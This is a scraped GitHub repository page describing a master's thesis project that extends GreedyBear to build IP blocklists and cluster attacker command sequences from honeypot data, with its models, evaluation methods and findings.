Generating Threat Intelligence Live Feeds Based on Honeypot Data

This repository contains the implementation code for my master's thesis on enhancing threat intelligence feeds through advanced generation mechanisms in GreedyBear.

Project Overview

The research focuses on improving the quality of threat intelligence feeds derived from honeypot data by:

Implementing IP blocklist generation mechanisms that prioritise malicious IP addresses
Developing command sequence clustering techniques to identify similar attack patterns across multiple sources
Creating a evaluation method to assess blocklist quality

The project extended GreedyBear with machine learning models and advanced clustering algorithms to transform raw honeypot data into more valuable threat intelligence for the security community.

Repository Structure

clustering/ - Implementation of command sequence clustering algorithms and similarity measures
data_in/ - Scripts for data gathering
data_out/ - Evaluation results
models/ - Implementation of scoring models for blocklist generation

Key Files

evaluate_clustering.py - Clustering quality analysis
evaluate_single_day.py - Single-day analysis of blocklists
evaluate_time_span.py - Analysis of blocklists over multiple days
greedybear_utils.py - Utility functions for interfacing with GreedyBear
train_models.py - Training pipeline for machine learning models with hyperparameter optimization

Implemented Models

The repository implements several scoring models for blocklist generation including:

Logistic Regression Classifier
Random Forest Classifier and Regressor
CatBoost Classifier, Regressor, and Ranker

For command sequence clustering, both DBSCAN and Agglomerative Hierarchical Clustering are implemented with Jaccard and Ratcliff/Obershelp similarity measures.

Evaluation

The evaluation methodology assesses blocklist quality through:

Prevention-based metrics: Measures how effectively generated blocklists would have prevented future honeypot interactions
Third-party validation: Compares generated blocklists against AbuseIPDB's confidence of abuse scores

Results

Key findings of this research include:

Classifier models excel at maximizing IP-based recall
Regressor/ranker models achieve superior interaction-based recall
DBSCAN clustering with Jaccard similarity provides a good alance of accuracy and computational efficiency for identifying attack patterns

The implemented techniques significantly outperform existing GreedyBear feed generation mechanisms and are already in operation.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

Generating Threat Intelligence Live Feeds Based on Honeypot Data

Project Overview

Repository Structure

Key Files

Implemented Models

Evaluation

Results

About

Uh oh!

Languages

Name		Name	Last commit message	Last commit date
Latest commit History 28 Commits
clustering		clustering
data_in		data_in
data_out		data_out
models		models
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
create_delta_file.py		create_delta_file.py
evaluate_clustering.py		evaluate_clustering.py
evaluate_single_day.py		evaluate_single_day.py
evaluate_time_span.py		evaluate_time_span.py
greedybear_utils.py		greedybear_utils.py
requirements.txt		requirements.txt
train_models.py		train_models.py

License

regulartim/masterthesis

Folders and files

Latest commit

History

Repository files navigation

Generating Threat Intelligence Live Feeds Based on Honeypot Data

Project Overview

Repository Structure

Key Files

Implemented Models

Evaluation

Results

About

Resources

License

Uh oh!

Stars

Watchers

Forks

Languages